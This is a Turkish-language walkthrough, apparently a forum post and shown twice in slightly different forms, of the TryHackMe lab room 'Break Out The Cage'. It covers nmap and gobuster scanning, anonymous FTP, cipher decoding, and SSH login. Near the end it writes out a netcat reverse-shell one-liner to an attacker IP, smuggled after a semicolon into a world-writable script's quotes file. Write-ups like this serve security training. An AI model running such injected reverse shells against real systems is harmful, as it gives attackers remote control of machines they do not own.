Eren Yılmaz tarafından yazılmıştır.
Merhaba, bu makalemde TryHackMe‘de bulunan “Break Out The Cage” isimli odayı hep beraber çözeceğiz ve yorumlayacağız. Hadi hemen başlayalım.
Oda: https://tryhackme.com/room/breakoutthecage1
Öncelikle bize verilen ip adresini nmap ile tarayalım.
nmap
4 adet bağlantı noktamız açık, aynı zamanda FTP üzerinden anonim giriş yapabileceğimizi görüyoruz. Bir deneyelim.
Filezilla yardımıyla FTP’ye anonim olarak bağlandıktan sonra dad_tasks diye bir dosya buluyoruz. Hadi indirelim.
filezilla
Dosyayı açtığımızda karşımıza base64 ile şifrelenmiş bir metin çıkıyor, decode ettiğimizde karşımıza aşağıdaki gibi bir metin çıkıyor.
Bu metin bir “vignere cipher” bulunuyor, bunu çözmek için önce bir anahtara ihtiyacımız var.
Açık bağlantı noktalarına bakarken 80 portunun açık olduğunu görmüştük, yani bir web sitesi ayakta. Gobuster ile dizinleri tarayalım.
gobuster
Dizinleri biraz kurcaladığımızda “auditions” isimli dizini buluyoruz, içinde bir ses dosyası var. Ses dosyasını açtığımızda parazitli bir konuşma ile karşılaşıyoruz, içerisine bir şey gizlendiğini düşünüp AudoCity ile açtıp spectrogram‘ına baktığımızda vignere cipher’in anahtarına ulaşıyoruz.
audacity
Anahtar ile birlikte şifreyi çözdükten sonra ise yeni metnimize ulaşıyoruz, içerisinde bize lazım olan weston kullanıcısının şifresi var.
Yukarıdaki şifre ile “weston” isimli kullanıcı olarak SSH’a giriş yapıyoruz.
Giriş yaptığımıza göre cage’e ait olan dosyaları bir arayalım.
“/opt/.dads_scripts/spread_the_quotes.py” dosyası dikkatimi çekiyor, içeriğine bir bakalım. İçerisinde bir python script’i var, izinlerine bakınca da herkesin dosyayı değiştirme yetkisi olduğunu görüyorum reverse shell eklemek için ideal.
terminal1
Bu komut ile quotes dosyasına reverse shell’imizi ekledik.
Ve içerdeyiz! user bayrağını okuyalım.
user.txt
Daha fazla içerik için takipte kalın!
[TR] Break Out The Cage WriteUp
Merhaba, bu makalemde TryHackMe‘de bulunan “Break Out The Cage” isimli odayı hep beraber çözeceğiz ve yorumlayacağız. Hadi hemen başlayalım.
Oda: https://tryhackme.com/room/breakoutthecage1
Bilgi Toplama
Öncelikle bize verilen ip adresini nmap ile tarayalım.
sudo nmap -A 10.10.7.223
nmap
4 adet bağlantı noktamız açık, aynı zamanda FTP üzerinden anonim giriş yapabileceğimizi görüyoruz. Bir deneyelim.
Filezilla yardımıyla FTP’ye anonim olarak bağlandıktan sonra dad_tasks diye bir dosya buluyoruz. Hadi indirelim.
filezilla
Dosyayı açtığımızda karşımıza base64 ile şifrelenmiş bir metin çıkıyor, decode ettiğimizde karşımıza aşağıdaki gibi bir metin çıkıyor.
Qapw Eekcl – Pvr RMKP…XZW VWUR… TTI XEF… LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt “urqsjetpwbn einyjamu” wf.
Iz glww A ykftef…. Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl
Bu metin bir “vignere cipher” bulunuyor, bunu çözmek için önce bir anahtara ihtiyacımız var.
Açık bağlantı noktalarına bakarken 80 portunun açık olduğunu görmüştük, yani bir web sitesi ayakta. Gobuster ile dizinleri tarayalım.
gobuster
Dizinleri biraz kurcaladığımızda “auditions” isimli dizini buluyoruz, içinde bir ses dosyası var. Ses dosyasını açtığımızda parazitli bir konuşma ile karşılaşıyoruz, içerisine bir şey gizlendiğini düşünüp AudoCity ile açtıp spectrogram‘ına baktığımızda vignere cipher’in anahtarına ulaşıyoruz.
audacity
Anahtar ile birlikte şifreyi çözdükten sonra ise yeni metnimize ulaşıyoruz, içerisinde bize lazım olan weston kullanıcısının şifresi var.
Dads Tasks – The RAGE…THE CAGE… THE MAN… THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what “information security” is.
In case I forget…. *************************************************
Aksiyon zamanı!
Yukarıdaki şifre ile “weston” isimli kullanıcı olarak SSH’a giriş yapıyoruz.
Giriş yaptığımıza göre cage’e ait olan dosyaları bir arayalım.
find / -user cage 2> /dev/null
“/opt/.dads_scripts/spread_the_quotes.py” dosyası dikkatimi çekiyor, içeriğine bir bakalım. İçerisinde bir python script’i var, izinlerine bakınca da herkesin dosyayı değiştirme yetkisi olduğunu görüyorum reverse shell eklemek için ideal.
terminal1
Bu komut ile quotes dosyasına reverse shell’imizi ekledik.
cd /opt/.dads_scripts/.files
echo “asd; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.52.178 1212 >/tmp/f” > .quotes
Ve içerdeyiz! user bayrağını okuyalım.
cat Super_Duper_Checklist
user.txt
Daha fazla içerik için takipte kalın!
Moderatör tarafında düzenlendi: